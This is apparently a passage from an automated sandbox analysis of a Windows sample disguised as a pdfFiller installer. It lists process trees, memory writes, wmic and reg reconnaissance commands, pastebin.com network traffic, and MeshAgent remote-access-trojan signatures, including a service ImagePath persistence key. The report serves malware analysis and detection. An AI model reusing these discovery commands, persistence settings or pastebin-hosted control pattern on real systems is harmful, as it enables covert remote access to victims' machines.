Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\Install(4).exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 2416 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 400 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 2576 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\Install(4).exe C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3020 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2556 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 592 N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 592 wrote to memory of 1080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 592 wrote to memory of 1080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 592 wrote to memory of 1080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

C:\Users\Admin\AppData\Local\Temp\Install(4).exe

"C:\Users\Admin\AppData\Local\Temp\Install(4).exe"

C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe

"C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8GKVE.tmp\pdfFiller.tmp" /SL5="$500EE,6038703,916992,C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe"

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe" -Duser.language=en -Duser.country=US -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Program Files (x86)\pdfFiller\pdfFiller.exe

"C:\Program Files (x86)\pdfFiller\pdfFiller.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1468

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-10-14 02:10

Reported

2024-10-14 02:13

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wgdi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\ole32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\bcrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ole32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wwin32u.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\apphelp.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wgdi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\combase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\comctl32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\oleaut32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wkernelbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ole32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\shcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\exe\MeshService.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ws2_32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wwin32u.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ntasn1.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wkernelbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\MeshService.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\ws2_32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wgdi32full.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wntdll.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dbgcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
